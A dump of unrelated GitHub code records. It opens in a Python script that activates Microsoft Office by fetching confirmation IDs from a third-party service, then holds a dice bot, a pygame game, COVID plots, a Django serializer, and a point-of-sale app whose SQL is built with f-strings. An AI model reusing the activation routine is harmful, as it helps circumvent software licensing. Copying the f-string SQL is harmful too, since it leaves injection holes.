result.stdout.strip()\n except subprocess.CalledProcessError as e:\n print(\"--- ERROR --- \\n -Errmsg: Error executing ospp.vbs:\", e)\n\n def run_ospp_command_user_input(self, command):\n \n if command in self.ospp_commands:\n ospp_command = self.ospp_commands[command]\n if \":value\" in ospp_command:\n value = input(f\"Enter the value for {ospp_command.split(':')[0]}: \").strip()\n if not value:\n raise ValueError(\"--- ERROR --- \\n -Errmsg: Value cannot be empty. Please try again.\")\n if 'inpkey' in ospp_command:\n #remove any dashes\n value = value.replace('-','').replace(' ', '')\n value = '-'.join(value[i:i+5] for i in range(0, len(value), 5))\n ospp_command = ospp_command.replace(\":value\", f\":{value}\")\n return self.execute_ospp_command(ospp_command)\n else:\n raise ValueError(\"--- ERROR --- \\n -Errmsg: Invalid command.\")\n \n def run_ospp_command(self, command, value=None):\n if command in self.ospp_commands:\n ospp_command = self.ospp_commands[command]\n if \":value\" in ospp_command:\n if not value:\n raise ValueError(\"--- ERROR --- \\n -Errmsg: Command needs a value to proceed. 
Please provide a valid value\")\n ospp_command = ospp_command.replace(\":value\", f\":{value}\")\n return self.execute_ospp_command(ospp_command)\n else:\n raise ValueError(\"--- ERROR --- \\n -Errmsg: Invalid command.\")\n \n\nclass OfficeActivation:\n def __init__(self) -> None:\n self.config = ConfigParser()\n self.config.read('config.ini')\n self.ospp = OSPPModule()\n self.actions = {\n 'activate_office_with_product_key': self.pid_activation,\n 'activate_office_with_installation_id': self.iid_activation,\n 'activate_office_with_confirmation_id': self.cid_activation,\n }\n self.ospp_actions = {\n 'display_installation_id': self.ospp.run_ospp_command,\n 'display_license_info': self.ospp.run_ospp_command\n }\n self.iid = ''\n self.cid = ''\n self.api_key = self.config.get('user_config', 'api_key')\n \n @property\n def api_url(self):\n return f'http://getcid.info/api/{self.iid}/{self.api_key}'\n \n def run_actions(self, action):\n if action in self.actions:\n return self.actions[action]()\n elif action in self.ospp_actions:\n print(self.ospp_actions[action](action))\n \n \n def print_available_options(self):\n print(\"Available options for Office Activation:\")\n for idx, option in enumerate(self.actions.keys(), 1):\n print(f\"{idx}. {option}\")\n \n print('\\nOptions for displaying Office info:')\n for idx, option in enumerate(self.ospp_actions.keys(), 4):\n print(f\"{idx}. {option}\")\n\n\n def get_action_by_number(self, number):\n if number < 1 or number > len(self.actions)+len(self.ospp_actions):\n raise ValueError(\"--- ERROR --- \\n -Errmsg: Invalid input. Please enter a valid number or 'exit' to quit \\n-------------\")\n \n return list(self.actions.keys() if number < 4 else self.ospp_actions)[number - 1 if number < 4 else number - 4]\n \n def get_installation_id(self):\n try:\n output = self.ospp.run_ospp_command('display_installation_id')\n # Use regex to find the lines containing \"Installation ID for\"\n pattern = r\"Installation ID for:[^\\n]*\"\n matches = re.findall(pattern, output)\n\n installation_ids = []\n for match in matches:\n # Check if the line contains \"Retail edition\" or \"MSDNR_Retail edition\"\n if \"Retail edition\" in match or \"MSDNR_Retail edition\" in match:\n # Extract the installation ID using regex\n id_pattern = r\"(?<=: )(\\d+)(?=[^:]*$)\"\n id_match = re.search(id_pattern, match)\n if id_match:\n installation_id = id_match.group(1)\n installation_ids.append(installation_id)\n \n if installation_ids and len(installation_ids) == 1:\n return installation_ids[0]\n else:\n raise Exception(\"--- ERROR --- \\n -Errmsg: Installation ID not found/multiple IDs found in the output \\n -------------\")\n\n except subprocess.CalledProcessError as e:\n print(\"--- ERROR --- \\n -Errmsg: Error retrieving installation ID:\", e, ' \\n -------------')\n \n def pid_activation(self):\n #install product key\n install_prod_key_command = self.ospp.run_ospp_command_user_input('install_product_key')\n print(install_prod_key_command)\n self.iid = self.get_installation_id()\n if not self.iid:\n raise ValueError('--- ERROR --- \\n -Errmsg: No Installation ID returned \\n -------------')\n \n #make request for confirmation id\n response = requests.get(self.api_url)\n response.raise_for_status()\n self.cid = response.json()\n with open('cid.txt', 'w') as file:\n # Write cid to file incase of failure\n print('------------------------------------ Outputting Confirmation ID to cid.txt --------------------------------------')\n print('--- In the event the cid activation failed, 
please proceed to option 3 and key in the cid from the text field ---')\n print('-----------------------------------------------------------------------------------------------------------------')\n file.write(str(self.cid))\n \n if not self.cid:\n raise ValueError('--- ERROR --- \\n -Errmsg: Confirmation ID cannot be empty \\n -------------')\n activate = self.ospp.run_ospp_command('activate_with_confirmation_id', self.cid)\n print(activate)\n \n def iid_activation(self):\n self.iid = input('Please enter the Installation ID: ')\n if not self.iid or len(self.iid) != 63:\n raise ValueError('--- ERROR --- \\n -Errmsg: Please enter a valid Installation ID \\n -------------')\n \n #make request for confirmation id\n response = requests.get(self.api_url)\n response.raise_for_status()\n self.cid = response.json()\n with open('cid.txt', 'w') as file:\n # Write cid to file incase of failure\n file.write(str(self.cid))\n \n if not self.cid:\n raise ValueError('--- ERROR --- \\n -Errmsg: Confirmation ID cannot be empty \\n -------------')\n activate = self.ospp.run_ospp_command('activate_with_confirmation_id', self.cid)\n print(activate)\n\n def cid_activation(self):\n self.cid = input('Please enter the Confirmation ID: ')\n \n if not self.cid or len(self.cid) != 48:\n raise ValueError('--- ERROR --- \\n -Errmsg: Please enter a valid Confirmation ID \\n -------------')\n activate = self.ospp.run_ospp_command('activate_with_confirmation_id', self.cid)\n print(activate)\n \n def start(self):\n print(\"--- Welcome to the Office Activation Script! ---\")\n while True:\n self.print_available_options()\n user_input = input(\"Enter the number of the command you want to run (or 'exit' to quit): \").lower()\n\n if user_input == \"exit\":\n break\n\n try:\n action_number = int(user_input)\n action = self.get_action_by_number(action_number)\n if action:\n self.run_actions(action)\n else:\n print(\"--- ERROR --- \\n -Errmsg: Invalid command number. 
\\n -------------\")\n            except ValueError as e:\n                print(str(e))\n            except Exception as e:\n                traceback.print_exc()\n                print(str(e))\n\n\nif __name__ == \"__main__\":\n    activation_script = OfficeActivation()\n    activation_script.start()\n","repo_name":"ashe0047/office-activation-script","sub_path":"ms_office_activation.py","file_name":"ms_office_activation.py","file_ext":"py","file_size_in_byte":11353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"28923242543","text":"# Command to set character-sheet attributes\nimport re\nimport os\nimport json\n\ncommons = {\n    '力量': ['str'], 'str': ['力量'],\n    '敏捷': ['dex'], 'dex': ['敏捷'],\n    '意志': ['pow', 'san', 'san值', '理智', '理智值'], 'pow': ['意志', 'san', 'san值', '理智', '理智值'],\n    '体质': ['con'], 'con': ['体质'],\n    '外貌': ['app'], 'app': ['外貌'],\n    '教育': ['知识', 'edu'], '知识': ['教育', 'edu'], 'edu': ['教育', '知识'],\n    '体型': ['siz'], 'siz': ['体型'],\n    '智力': ['灵感', 'int'], '灵感': ['智力', 'int'], 'int': ['智力', '灵感'],\n    'san': ['san值', '理智', '理智值'], 'san值': ['san', '理智', '理智值'], '理智': ['san', 'san值', '理智值'], '理智值': ['san', 'san值', '理智'],\n    '幸运': ['运气'], '运气': ['幸运'],\n    'mp': ['魔法'], '魔法': ['mp'],\n    'hp': ['体力'], '体力': ['hp'],\n    '计算机': ['计算机使用', '电脑'], '计算机使用': ['计算机', '电脑'], '电脑': ['计算机', '计算机使用'],\n    '信用': ['信誉', '信用评级'], '信誉': ['信用', '信用评级'], '信用评级': ['信用', '信誉'],\n    '克苏鲁': ['克苏鲁神话', 'cm'], '克苏鲁神话': ['克苏鲁', 'cm'], 'cm': ['克苏鲁', '克苏鲁神话'],\n    '汽车': ['驾驶', '汽车驾驶'], '驾驶': ['汽车', '汽车驾驶'], '汽车驾驶': ['汽车', '驾驶'],\n    '步枪': ['霰弹枪', '步霰'], '霰弹枪': ['步枪', '步霰'], '步霰': ['步枪', '霰弹枪'],\n    '图书馆': ['图书馆使用'], '图书馆使用': ['图书馆'],\n    '开锁': ['撬锁', '锁匠'], '撬锁': ['开锁', '锁匠'], '锁匠': ['开锁', '撬锁'],\n    '博物学': ['自然学'], '自然学': ['博物学'],\n    '领航': ['导航'], '导航': ['领航'],\n    '重型操作': ['重型机械', '操作重型机械', '重型'], '重型机械': ['重型操作', '操作重型机械', '重型'], '操作重型机械': ['重型操作', '重型机械', '重型'], '重型': ['重型操作', '重型机械', '操作重型机械'],\n}\n\n\ndef set_attributes(text: str, group_id: str, user_id: str) -> dict | None:\n    '''\n    Function: set attributes on a character sheet.\n\n    Parameters:\n\n    text: str  the user's plain-text message with the command prefix stripped.\n    group_id: str  the current group id.\n    user_id: str  the user's QQ id.\n\n    Returns:\n    : dict | None  a dict with the data and the request status field \"status\".\n    '''\n    attrs = re.findall(r'[\\D]+[\\d]+', text)\n    if len(attrs) == 0:\n        return None\n    attrs_new = {}\n    for attr in attrs:\n        aname = re.findall(r'[^-+\\d\\s]+', attr)[0]\n        avalue = re.findall(r'[-+\\d]+', attr)[0]\n        attrs_new[aname] = avalue\n    path_ = f'data/toidice/users/{user_id}'\n    if not os.path.exists(path_):\n        return {'status': 'USER_NOTFOUND'}\n    datas = get_playercharacter(path_, group_id)\n    if datas is None:\n        return {'status': 'PC_NOTFOUND'}\n    pc = datas['pc']\n    for kv in attrs_new.items():\n        if re.search(r'[-+]', kv[1]):\n            avalue_new = pc['attrs'][kv[0]]+int(kv[1])\n            pc['attrs'][kv[0]] = avalue_new\n        else:\n            avalue_new = int(kv[1])\n            pc['attrs'][kv[0]] = avalue_new\n        if kv[0] in commons.keys():\n            for key in commons[kv[0]]:\n                pc['attrs'][key] = avalue_new\n    with open(datas['path_pc'], 'w') as f:\n        f.write(json.dumps(pc, ensure_ascii=False))\n        f.close()\n    return {'cname': datas['cname'], 'status': 'SET_OK'}\n\n\ndef get_playercharacter(path_: str, group_id: str) -> dict | None:\n    '''\n    (internal helper)\n    Function: fetch a character sheet.\n\n    Parameters:\n\n    path_: str  path to the user's character-sheet folder.\n    group_id: str  the current group id.\n\n    Returns:\n    : dict | None  a dict with the sheet path path_pc, the sheet name cname and the sheet data pc.\n    '''\n    for root, dirs, files in os.walk(path_):\n        for file in files:\n            with open(f'{path_}/{file}', 'r') as f:\n                pc = json.load(f)\n                f.close()\n            try:\n                if pc['groups'][group_id] == 1:\n                    return {'path_pc': f'{path_}/{file}', 'cname': file.replace('.json', ''), 'pc': pc}\n            except KeyError:\n                continue\n    return 
None\n","repo_name":"roadranmee-orangecuk/nonebot_plugin_toidice","sub_path":"set.py","file_name":"set.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"34311479215","text":"# MD BAHAUDDIN\r\n# NATIONAL INSTITUTE OF TECHNOLOGY\r\n# Space Invaders\r\n\r\n# pyGames.org \r\n# download pip by 'pip install pygame' for package manager\r\nimport random\r\nimport pygame\r\n# import pygame in our profile\r\nimport math\r\nfrom pygame import mixer\r\n# for music \r\n\r\n# initialize the pygame\r\npygame.init() \r\n# without it the game will not work\r\n\r\n# creating window/screen\r\nscreen = pygame.display.set_mode((800,600))\r\n# Width, height\r\n# inside the bracket there is another bracket because it is a tuple and without it this won't work\r\n# After a few seconds the window goes away :(\r\n# So we will create an infinite loop \r\n\r\n# Background Music \r\nmixer.music.load('background.mp3')\r\nmixer.music.play(-1)\r\n\r\n# Title & Icon of the window\r\npygame.display.set_caption(\"Space Invaders\")\r\nicon = pygame.image.load(\"ufo.png\")\r\npygame.display.set_icon(icon)\r\n\r\n# Player\r\nplayerImg = pygame.image.load('space-invaders.png')\r\nplayerX = 370\r\nplayerY = 480\r\nplayerX_change = 0\r\n# values depend on the screen, which is set such that the image will appear in the middle \r\n\r\n# Enemy\r\nEnemyImg = []\r\n# this is a list, i.e. an array\r\nenemyX = []\r\nenemyY = []\r\nEnemyX_change = []\r\nEnemyY_change = []\r\nnum_of_enemies = 3\r\n\r\nfor i in range(num_of_enemies):\r\n    EnemyImg.append(pygame.image.load('enemy.png'))\r\n    enemyX.append(random.randint(0,800))\r\n    enemyY.append(random.randint(50,180))\r\n    EnemyX_change.append(5)\r\n    EnemyY_change.append(40)\r\n\r\n\r\n\r\n\r\n# Background set\r\nbackgroundImg = pygame.image.load('background.png')\r\n\r\n# Bullet\r\n# Ready - you can't see the bullet before fire\r\nbulletImg = pygame.image.load('bullet.png')\r\nbulletX = 0\r\nbulletY = 480\r\nbulletX_change = 0\r\nbulletY_change = 10\r\nbullet_state = \"ready\"\r\n\r\n# FONT \r\n# Score card\r\nscore_value = 0 \r\nfont = pygame.font.Font('freesansbold.ttf',22)\r\ntextX = 10\r\ntextY = 10\r\n# positions x,y\r\n\r\n# Game Over (note: assign only over_font here, so the 22pt score font is not overwritten)\r\nover_font = pygame.font.Font('freesansbold.ttf',66)\r\n\r\ndef show_score(x,y):\r\n    score = font.render(\"Score : \" + str(score_value), True, (255,255,255))\r\n    screen.blit(score, (x,y))\r\n\r\ndef game_over_text():\r\n    over_text = over_font.render(\"GAME OVER\", True, (255,255,255))\r\n    screen.blit(over_text, (200,250))\r\n    # we have to render the text first, then print/show it \r\n\r\n\r\n# creating function , loading image , (image x location, image y location) \r\ndef player(x,y):\r\n    screen.blit(playerImg, (x,y))\r\n# added x, y so that player can move on x- & y- axes\r\n\r\n# Creating enemy \r\ndef enemy(x,y, i):\r\n    screen.blit(EnemyImg[i], (x,y))\r\n\r\ndef background():\r\n    screen.blit(backgroundImg, (0,0))\r\n\r\ndef fire_bullet(x,y):\r\n    global bullet_state\r\n    bullet_state = \"fire\"\r\n    screen.blit(bulletImg,(x+16,y+10))\r\n\r\n# for Collision of bullet with enemy we use this function\r\n# they collide when the distance between them becomes 0 \r\ndef isCollision(enemyX,enemyY,bulletX,bulletY):\r\n    distance = math.sqrt(math.pow(bulletX-enemyX,2) + math.pow(bulletY-enemyY,2))\r\n    if distance < 50 :\r\n        return True\r\n    else:\r\n        return False \r\n\r\n\r\n\"\"\"while True:\r\n    pass\"\"\"\r\n# running this loop would hang the program, so we will add a quit button\r\n# everything happens through keyboard events: cancel/exit, left, right, up and down buttons are events\r\n\r\n# Game Loop \r\nrunning = True\r\n# running is the close-button flag \r\nwhile running:\r\n    # we change the background\r\n    # we added the fill (RGB) color but we did not update the screen yet\r\n    screen.fill((1,100,1))\r\n    background()\r\n    for eventt in pygame.event.get():\r\n        if eventt.type == pygame.QUIT:\r\n            running = False\r\n        \r\n        # if a keystroke is pressed, whether left or right\r\n        if eventt.type == pygame.KEYDOWN:\r\n            # means a keystroke was pressed on the keyboard\r\n            if eventt.key == pygame.K_LEFT:\r\n                # print(\"Left is pressed\")\r\n                playerX_change = -6\r\n            if eventt.key == pygame.K_RIGHT:\r\n                # print(\"RIGHT is pressed\")\r\n                playerX_change = 6\r\n\r\n            # for the bullet: if space is pressed the bullet will show\r\n            # since the bullet follows the spacecraft we use the bulletX var...\r\n\r\n            if eventt.key == pygame.K_SPACE:\r\n                if bullet_state == \"ready\":\r\n                    bullet_Sound = mixer.Sound('laser.wav')\r\n                    bullet_Sound.play()\r\n                    bulletX = playerX\r\n                    fire_bullet(bulletX,bulletY)\r\n\r\n        # keydown means pressing a key , keyup means releasing a key \r\n        if eventt.type == pygame.KEYUP:\r\n            if eventt.key == pygame.K_LEFT or eventt.key == pygame.K_RIGHT:\r\n                # print(\"Keystroke is released\")\r\n                playerX_change = 0\r\n\r\n\r\n\r\n    # we draw the player after screen.fill so that the player comes after the screen background \r\n    # otherwise the background would overlap the player\r\n    playerX += playerX_change\r\n    # to change the position of the spaceship \r\n    \r\n\r\n    # Spaceship should not go beyond the screen\r\n    if playerX <= 0:\r\n        playerX = 0\r\n\r\n    if playerX >= 736:\r\n        playerX = 736\r\n    \r\n    # Enemy \r\n    # Enemy movement \r\n    for i in range(num_of_enemies):\r\n\r\n        # Game over \r\n        if enemyY[i] > 430:\r\n            for j in range(num_of_enemies):\r\n                enemyY[i]= 2000\r\n            game_over_text()\r\n            break\r\n\r\n        enemyX[i] += EnemyX_change[i]\r\n        \r\n        if enemyX[i] <= 0:\r\n            EnemyX_change[i] = 5\r\n            enemyY[i] += EnemyY_change[i]\r\n        elif enemyX[i] >= 770:\r\n            EnemyX_change[i] = -5\r\n            enemyY[i] += EnemyY_change[i]\r\n\r\n        # Collision condition\r\n        collision = isCollision(enemyX[i], enemyY[i], bulletX, bulletY)\r\n        if collision:\r\n            explosion_Sound = mixer.Sound('explosion.wav')\r\n            explosion_Sound.play()\r\n            bulletY = 480\r\n            bullet_state = \"ready\"\r\n            score_value += 100\r\n            # print(score)\r\n            enemyX[i] = random.randint(0,800)\r\n            enemyY[i] = random.randint(50,180)\r\n        \r\n        # displaying enemy \r\n        enemy(enemyX[i],enemyY[i], i)\r\n        \r\n\r\n    # Bullet Movement \r\n    if bulletY <= 0:\r\n        bulletY = 480\r\n        bullet_state = \"ready\"\r\n\r\n    if bullet_state == \"fire\":\r\n        fire_bullet(bulletX,bulletY)\r\n        bulletY -= bulletY_change\r\n        # the bullet has fired and cannot fire again until it resets \r\n\r\n    \r\n\r\n    # displaying player craft\r\n    player(playerX,playerY)\r\n    \r\n    show_score(textX, textY)\r\n    # updating the screen\r\n    pygame.display.update()\r\n","repo_name":"mbahau/Space-Invaders","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"38021390093","text":"'''\r\n* Time Series Forecasting Applications\r\n* Coronavirus Plots in Light of the Daily Data\r\n* Date: 03 April 2020\r\n* Prepared by: Bilishim Cyber Security and Artificial Intelligence\r\n* These studies were prepared solely for R&D and to advance knowledge; they carry no official representation or binding force.\r\n'''\r\nfrom pandas import read_csv\r\nfrom pandas import 
Series\r\nfrom pandas import DataFrame\r\nfrom matplotlib import pyplot\r\nfrom pandas import TimeGrouper\r\nfrom pandas import concat\r\n\r\n# Daily confirmed-case time plot\r\nseries = read_csv('corona-virus-istatistikleri-resampled.csv', header=0, usecols=[2])\r\nseries.plot()\r\npyplot.show()\r\n\r\n\r\n# Daily deaths time plot\r\nseries = read_csv('corona-virus-istatistikleri-resampled.csv', header=0, usecols=[3])\r\nseries.plot(style='k.')\r\npyplot.show()\r\n\r\n\r\n# Daily case/test ratio distribution plot\r\nseries = read_csv('corona-virus-istatistikleri-resampled.csv', header=0, usecols=[9])\r\nseries.plot(kind='kde')\r\npyplot.show()\r\n\r\n\r\n# Test counts per day\r\nseries = Series.from_csv('corona-virus-istatistikleri-resampled.csv', header=0)\r\none_year = series['2020']\r\ngroups = one_year.groupby(TimeGrouper('D'))\r\ndays = concat([DataFrame(x[1].values) for x in groups], axis=1)\r\ndays = DataFrame(days)\r\ndays.columns = range(1,22)\r\ndays.boxplot()\r\npyplot.show()\r\n\r\n\r\n\r\n","repo_name":"bilishim/covid19","sub_path":"corona-line-plot.py","file_name":"corona-line-plot.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"22721877828","text":"from itertools import combinations as comb\n\n\ndef main():\n    a, b, c = map(int, input().split())\n    li = comb([a, b, c], 2)\n    Count = 0\n    for l in li:\n        if l[0] == l[1]:\n            Count += 1\n\n    if Count == 1:\n        print(\"Yes\")\n    else:\n        print(\"No\")\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"Msksgm/atcoder_msksgm_practice","sub_path":"abc/155/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
+{"seq_id":"39492951897","text":"\"\"\"Memberships serializers.\"\"\"\r\n\r\n# REST Framework\r\nfrom rest_framework import serializers\r\n\r\n# Serializers\r\nfrom bookshare.users.serializers import UserModelSerializer\r\n\r\n# Models\r\nfrom bookshare.circles.models import Membership, Invitation\r\n\r\n# Utils\r\nfrom django.utils import timezone\r\n\r\nclass MembershipModelSerializer(serializers.ModelSerializer):\r\n    \"\"\"Membership model serializer.\"\"\"\r\n\r\n    user = UserModelSerializer(read_only=True)\r\n    joined_at = serializers.DateTimeField(source='created', read_only=True)\r\n    invited_by = serializers.StringRelatedField()\r\n\r\n    class Meta:\r\n        model = Membership\r\n        fields = [\r\n            'user',\r\n            'remaning_invitations',\r\n            'invited_by',\r\n            'is_admin',\r\n            'lends_offered',\r\n            'lends_taked',\r\n            'joined_at'\r\n        ]\r\n\r\n\r\nclass AddMemberSerializer(serializers.Serializer):\r\n    \"\"\"Serializer that adds a member to a circle from an invitation code.\"\"\"\r\n    user = serializers.HiddenField(default=serializers.CurrentUserDefault())\r\n    code = serializers.CharField()\r\n    remaning_invitations = serializers.IntegerField()\r\n\r\n    def validate_user(self, data):\r\n        \"\"\"Verify that the user is not already in the circle.\"\"\"\r\n\r\n        self.circle = self.context.get('circle')\r\n\r\n        query = Membership.objects.filter(\r\n            circle=self.circle,\r\n            user=data\r\n        )\r\n        if query.exists():\r\n            raise serializers.ValidationError('User is already a member.')\r\n\r\n        return data\r\n\r\n    def validate_code(self, data):\r\n        \"\"\"Verify that the code is valid.\"\"\"\r\n\r\n        try:\r\n            query = Invitation.objects.get(\r\n                code=data,\r\n                circle=self.circle,\r\n                used=False\r\n            )\r\n        except Invitation.DoesNotExist:\r\n            raise serializers.ValidationError('Invalid code.')\r\n\r\n        self.invitation = 
query\r\n\r\n return data\r\n\r\n def validate(self, data):\r\n \"\"\"Validate if a new member can be added.\"\"\"\r\n\r\n if self.circle.members_limit != 0:\r\n counter = self.circle.members.count()\r\n diff = self.circle.members_limit - counter\r\n if diff <= 0:\r\n raise serializers.ValidationError('Circles has reached his members limit')\r\n\r\n return data\r\n\r\n\r\n def create(self, validated_data):\r\n\r\n\r\n member = Membership.objects.create(\r\n circle=self.circle,\r\n invited_by=self.invitation.issued_by,\r\n user=validated_data['user'],\r\n is_admin=False,\r\n is_active=True,\r\n remaning_invitations=validated_data['remaning_invitations']\r\n )\r\n\r\n # Updates\r\n\r\n # Invitation\r\n self.invitation.used_by = validated_data['user']\r\n self.invitation.used = True\r\n self.invitation.used_at = timezone.now()\r\n self.invitation.save()\r\n\r\n # Issuer\r\n issuer = Membership.objects.get(\r\n user=self.invitation.issued_by,\r\n circle=self.circle\r\n )\r\n issuer.remaning_invitations -= 1\r\n issuer.save()\r\n\r\n return member\r\n","repo_name":"ezecavallo/bookshare","sub_path":"bookshare/circles/serializers/memberships.py","file_name":"memberships.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70259513530","text":"phone_num_dic = {\n 'Marketing' : {\n 'Robert': '111-111-1111',\n 'Shawn' : '222-222-2222',\n 'Bryce': '333-333-3333'\n },\n 'It' : {\n 'Lisa': '444-444-4444',\n 'Jason':'555-555-5555'\n }\n}\n\n# Get All departments in phone_num_dic\ndepartment = []\nfor dep , emp in phone_num_dic.items():\n print(dep)\n department.append(dep)\n\nprint(f\"All department is dictionary is {department}\")\n# All department is dictionary is ['Marketing', 'It']\n\n\n# Get All employee in phone_num_dic\nemployee = []\nfor dep, emp in phone_num_dic.items():\n #print(emp.items())\n for name, phone in emp.items():\n employee.append(name)\nprint(f\"All Employee is dictionary is {employee}\")\n#All Employee is dictionary is ['Robert', 'Shawn', 'Bryce', 'Lisa', 'Jason']\n\n''' Using a list comprehension, get all employee's Name '''\nemployees = [list(emp.keys()) for dep, emp in phone_num_dic.items()]\n\nprint(employees) #[['Robert', 'Shawn', 'Bryce'], ['Lisa', 'Jason']]\n\n''' for employee in employees:\n for e in employee:\n print(e) '''\n# Flatten to remove list of lists and convert to a single list\nemployee = [employee for employee in employees for employee in employee] \nprint(employee) \n\n\n'''Using a list comprehension & intertools chain, get all phone number '''\nfrom itertools import chain\nphonenumbers = [list(emp.values()) for dep, emp in phone_num_dic.items()]\nprint(phonenumbers) # [['111-111-1111', '222-222-2222', '333-333-3333'], ['444-444-4444', '555-555-5555']]\n\nphoneNumbers =list(chain.from_iterable([list(emp.values()) for dep, emp in phone_num_dic.items()]))\nprint(phoneNumbers) #['111-111-1111', '222-222-2222', '333-333-3333', '444-444-4444', '555-555-5555']\n\n ","repo_name":"Zioq/Algorithms-and-Data-Structures-With-Python","sub_path":"5.Iterations/nestedDic.py","file_name":"nestedDic.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14616574274","text":"from selenium.common.exceptions import NoSuchElementException\n\nclass KybTest(object):\n def __init__(self,driver):\n self.driver=driver\n\n def check_cancelBtn(self):\n print('check cancelBtn')\n\n try:\n 
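# the update dialog is not shown on every launch, so probe for its cancel button\n            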
cancelBtn = self.driver.find_element_by_id('android:id/button2')\n except NoSuchElementException:\n print('no cancelBtn')\n else:\n cancelBtn.click()\n\n def check_skipBtn(self):\n print('check skipBtn')\n\n try:\n skipBtn = self.driver.find_element_by_id('com.tal.kaoyan:id/tv_skip')\n except NoSuchElementException:\n print('no skipBtn')\n else:\n skipBtn.click()\n\n def skip_update_guide(self):\n self.check_cancelBtn()\n self.check_skipBtn()","repo_name":"LIShuLin0312/appium_sync","sub_path":"kyb_test.py","file_name":"kyb_test.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"77"} +{"seq_id":"42098569220","text":"vechicles = {\r\n 'dream': 'honda 250',\r\n 'roadster': 'bmw r1100',\r\n \"er5\": \"kawasaki er5\",\r\n \"virago\": \"yamaha xt750\"\r\n}\r\nmy_car = vechicles[\"dream\"]\r\nprint(my_car)\r\nmy = vechicles[\"virago\"] # INDEXING RETURNS KEY ERROR WHEN KEY IS WRONG (INDEXING IS FASTER THAN GET)\r\n# BUT USE ONLY U KNOW KEY\r\nprint(my)\r\nnew = vechicles.get(\"ER5\") # .GET RETURNS NONE WHEN KEY IS WRONG (USE WHEN U NOT SURE IN KEY IS CORRECT OR NOT)\r\nprint(new)\r\nprint()\r\nprint()\r\n\r\n# Adding items\r\nvechicles[\"star\"] = \"lockracer\"\r\nvechicles[\"toy\"] = \"glider\"\r\nfor key in vechicles:\r\n print(key, vechicles[key], sep=\" : \")\r\nprint(\"!1111111111111111111111111111\")\r\nvechicles[\"virago\"] = \"new yamaha\"\r\nfor key, val in vechicles.items(): # MORE EFFICIENT\r\n print(key, val, sep=\" : \")\r\ndel vechicles[\"virago\"]\r\n# del vechicles[\"f1\"] ithu error key not present\r\nresult = vechicles.pop(\"f1\",\r\n \"##########################podu illa\") # default aa error the varu pop la um ,ku apro namma pop\r\n# kita sollula enna return aganu nu\r\nprint(result)\r\nprint(\"2222222222222222222222222222222222\")\r\nfor key, val in vechicles.items(): # MORE EFFICIENT\r\n print(key, val, sep=\" : \")\r\n\r\nval = vechicles.pop(\"dream\")\r\nprint(\"ithu present : \", val)\r\nval = vechicles.pop(\"roadster\", \"not present\") # its is true actually\r\nprint(val)\r\n","repo_name":"logeshnatarajan/basic_python","sub_path":"dictionary_and_set/dict_intro.py","file_name":"dict_intro.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"71732522490","text":"from interface import *\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtGui import QClipboard\r\nfrom PyQt5.QtWidgets import QApplication, QMessageBox\r\nimport sys\r\nimport sqlite3\r\nfrom PyQt5.QtGui import *\r\nfrom datetime import datetime\r\n\r\n\r\ndef main(ui):\r\n try:\r\n # Criando Banco de dados e Tabelas\r\n banco = sqlite3.connect('banco_dados.db')\r\n cursor = banco.cursor()\r\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS produtos (\r\n id integer PRIMARY KEY AUTOINCREMENT,\r\n codigo integer,\r\n produto text,\r\n preco REAL)\"\"\")\r\n banco.commit()\r\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS notas (\r\n id integer PRIMARY KEY AUTOINCREMENT,\r\n caixa integer,\r\n nota text,\r\n valor real,\r\n data text)\"\"\")\r\n banco.commit()\r\n cursor.execute(\"\"\"CREATE TABLE IF NOT EXISTS gestao (\r\n id integer PRIMARY KEY AUTOINCREMENT,\r\n caixa integer,\r\n codigo integer,\r\n quantidade integer,\r\n data text)\"\"\")\r\n banco.commit()\r\n banco.close()\r\n except sqlite3.Error as erro:\r\n print(f'Erro de nome: {erro}')\r\n\r\n def data_agora():\r\n data = str(datetime.today())\r\n 
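# drop the microseconds suffix ('.ffffff', the last 7 characters of str(datetime.today()))\r\n        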
data = str(data[:-7])\r\n        data = data.replace(' ','-')\r\n        return data\r\n\r\n    def mostrar_msg(titulo, texto):\r\n        titulo = str(titulo)\r\n        texto = str(texto)\r\n        win = MainWindow\r\n        msg = QMessageBox(win)\r\n        msg.setWindowTitle(f\"{titulo}\")\r\n        msg.setText(f\"{texto}\")\r\n        x = msg.exec_()\r\n\r\n    def definir_metodo_pagamento():\r\n        if ui.rd_cartao.isChecked() == False and ui.rd_dinheiro.isChecked() == False:\r\n            retorno = 'nao selecionado'\r\n        elif ui.rd_dinheiro.isChecked():\r\n            retorno = 'DINHEIRO'\r\n        else:\r\n            retorno = 'CARTAO'\r\n        return retorno\r\n\r\n    def enviar_banco_notas():\r\n        caixa = ui.lb_caixa.text()\r\n        nota = ui.txt_nota.toPlainText()\r\n        valor = ui.txt_preco.text()\r\n        banco = sqlite3.connect('banco_dados.db')\r\n        data = str(data_agora())\r\n        cursor = banco.cursor()\r\n        # cursor.execute(f\"INSERT INTO notas values (NULL,'{caixa}','{nota}','{valor},'{data}')\")\r\n        cursor.execute(f\"INSERT INTO notas values (NULL,'{caixa}','{nota}','{valor}','{data}')\")\r\n        banco.commit()\r\n\r\n    def 